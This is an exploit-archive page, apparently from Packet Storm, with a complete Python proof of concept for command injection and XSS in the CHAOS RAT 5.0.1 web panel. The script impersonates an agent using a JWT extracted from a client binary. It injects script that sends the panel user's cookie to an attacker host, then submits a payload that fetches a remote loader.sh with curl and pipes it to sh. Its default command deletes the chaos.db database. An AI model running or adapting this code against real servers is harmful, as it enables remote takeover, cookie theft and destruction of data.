what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

CHAOS RAT 5.0.1 Remote Command Execution

CHAOS RAT 5.0.1 Remote Command Execution
Posted Apr 10, 2024
Authored by chebuya

CHAOS RAT web panel version 5.0.1 is vulnerable to command injection, which can be triggered from a cross site scripting attack, allowing an attacker to takeover the RAT server.

tags | exploit, web, xss
advisories | CVE-2024-30850, CVE-2024-31839
SHA-256 | 343ca35b11570c993ed8818aa37a56638c474563d756a7ac0c8f9334b16b6ca5

CHAOS RAT 5.0.1 Remote Command Execution

Change Mirror Download
# Exploit Title: CHAOS RAT v5.0.1 RCE
# Date: 2024-04-05
# Exploit Author: @_chebuya
# Software Link: https://github.com/tiagorlampert/CHAOS
# Version: v5.0.1
# Tested on: Ubuntu 20.04 LTS
# CVE: CVE-2024-30850, CVE-2024-31839
# Description: The CHAOS RAT web panel is vulnerable to command injection, which can be triggered from an XSS, allowing an attacker to takeover the RAT server
# Github: https://github.com/chebuya/CVE-2024-30850-chaos-rat-rce-poc
# Blog: https://blog.chebuya.com/posts/remote-code-execution-on-chaos-rat-via-spoofed-agents/
import time
import requests
import threading
import json
import websocket
import http.client
import argparse
import sys
import re

from functools import partial
from http.server import BaseHTTPRequestHandler, HTTPServer

class Collector(BaseHTTPRequestHandler):
def __init__(self, ip, port, target, command, video_name, *args, **kwargs):
self.ip = ip
self.port = port
self.target = target
self.shell_command = command
self.video_name = video_name
super().__init__(*args, **kwargs)

def do_GET(self):
if self.path == "/loader.sh":
self.send_response(200)
self.end_headers()
command = str.encode(self.shell_command)
self.wfile.write(command)
elif self.path == "/video.mp4":
with open(self.video_name, 'rb') as f:
self.send_response(200)
self.send_header('Content-type', 'video/mp4')
self.end_headers()
self.wfile.write(f.read())
else:
cookie = self.path.split("=")[1]
self.send_response(200)
self.end_headers()
self.wfile.write(b"")

background_thread = threading.Thread(target=run_exploit, args=(cookie, self.target, self.ip, self.port))
background_thread.start()

def convert_to_int_array(string):
int_array = []
for char in string:
int_array.append(ord(char))
return int_array

def extract_client_info(path):
with open(path, 'rb') as f:
data = str(f.read())

address_regexp = r"main\.ServerAddress=(?:[0-9]{1,3}\.){3}[0-9]{1,3}"
address_pattern = re.compile(address_regexp)
address = address_pattern.findall(data)[0].split("=")[1]

port_regexp = r"main\.Port=\d{1,6}"
port_pattern = re.compile(port_regexp)
port = port_pattern.findall(data)[0].split("=")[1]

jwt_regexp = r"main\.Token=[a-zA-Z0-9_\.\-+/=]*\.[a-zA-Z0-9_\.\-+/=]*\.[a-zA-Z0-9_\.\-+/=]*"
jwt_pattern = re.compile(jwt_regexp)
jwt = jwt_pattern.findall(data)[0].split("=")[1]

return f"{address}:{port}", jwt

def keep_connection(target, cookie, hostname, username, os_name, mac, ip):

print("Spoofing agent connection")
headers = {
"Cookie": f"jwt={cookie}"
}

while True:
data = {"hostname": hostname, "username":username,"user_id": username,"os_name": os_name, "os_arch":"amd64", "mac_address": mac, "local_ip_address": ip, "port":"8000", "fetched_unix":int(time.time())}
r = requests.get(f"http://{target}/health", headers=headers)
r = requests.post(f"http://{target}/device", headers=headers, json=data)
time.sleep(30)

def handle_command(target, cookie, mac, ip, port):
print("Waiting to serve malicious command outupt")
headers = {
"Cookie": f"jwt={cookie}",
"X-Client": mac
}

ws = websocket.WebSocket()
ws.connect(f'ws://{target}/client', header=headers)
while True:
response = ws.recv()

command = json.loads(response)['command']
data = {"client_id": mac, "response": convert_to_int_array(f"</pre><script>var i = new Image;i.src='http://{ip}:{port}/'+document.cookie;</script><video loop controls autoplay><source src=\"http://{ip}:{port}/video.mp4\" type=\"video/mp4\"></video>"), "has_error": False}

ws.send_binary(json.dumps(data))


def run_exploit(cookie, target, ip, port):
print(f"Exploiting {target} with JWT {cookie}")
conn = http.client.HTTPConnection(target)
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0',
'Content-Type': 'multipart/form-data; boundary=---------------------------196428912119225031262745068932',
'Cookie': f'jwt={cookie}'
}
conn.request(
'POST',
'/generate',
f'-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="address"\r\n\r\nhttp://localhost\'$(IFS=];b=curl]{ip}:{port}/loader.sh;$b|sh)\'\r\n-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="port"\r\n\r\n8080\r\n-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="os_target"\r\n\r\n1\r\n-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="filename"\r\n\r\n\r\n-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="run_hidden"\r\n\r\nfalse\r\n-----------------------------196428912119225031262745068932--\r\n',
headers
)

def run(ip, port, target, command, video_name):
server_address = (ip, int(port))

collector = partial(Collector, ip, port, target, command, video_name)
httpd = HTTPServer(server_address, collector)
print(f'Server running on port {ip}:{port}')
httpd.serve_forever()

if __name__ == "__main__":
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers(dest="option")

exploit = subparsers.add_parser("exploit")
exploit.add_argument("-f", "--file", help="The path to the CHAOS client")
exploit.add_argument("-t", "--target", help="The url of the CHAOS server (127.0.0.1:8080)")
exploit.add_argument("-c", "--command", help="The command to use", default=r"find / -name chaos.db -exec rm -f {} \;")
exploit.add_argument("-v", "--video-name", help="The video name to use", default="rickroll.mp4")
exploit.add_argument("-j", "--jwt", help="The JWT token to use")
exploit.add_argument("-l", "--local-ip", help="The local IP to use for serving bash script and mp4", required=True)
exploit.add_argument("-p", "--local-port", help="The local port to use for serving bash script and mp4", default=8000)
exploit.add_argument("-H", "--hostname", help="The hostname to use for the spoofed client", default="DC01")
exploit.add_argument("-u", "--username", help="The username to use for the spoofed client", default="Administrator")
exploit.add_argument("-o", "--os", help="The OS to use for the spoofed client", default="Windows")
exploit.add_argument("-m", "--mac", help="The MAC address to use for the spoofed client", default="3f:72:58:91:56:56")
exploit.add_argument("-i", "--ip", help="The IP address to use for the spoofed client", default="10.0.17.12")

extract = subparsers.add_parser("extract")
extract.add_argument("-f", "--file", help="The path to the CHAOS client", required=True)

args = parser.parse_args()

if args.option == "exploit":
if args.target != None and args.jwt != None:
target = args.target
jwt = args.jwt
elif args.file != None:
target, jwt = extract_client_info(args.file)
else:
exploit.print_help(sys.stderr)
sys.exit(1)

bg = threading.Thread(target=keep_connection, args=(target, jwt, args.hostname, args.username, args.os, args.mac, args.ip))
bg.start()

cmd = threading.Thread(target=handle_command, args=(target, jwt, args.mac, args.local_ip, args.local_port))
cmd.start()

server = threading.Thread(target=run, args=(args.local_ip, args.local_port, target, args.command, args.video_name))
server.start()

elif args.option == "extract":
target, jwt = extract_client_info(args.file)
print(f"CHAOS server: {target}\nJWT: {jwt}")
else:
parser.print_help(sys.stderr)
sys.exit(1)
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    17 Files
  • 21
    May 21st
    18 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close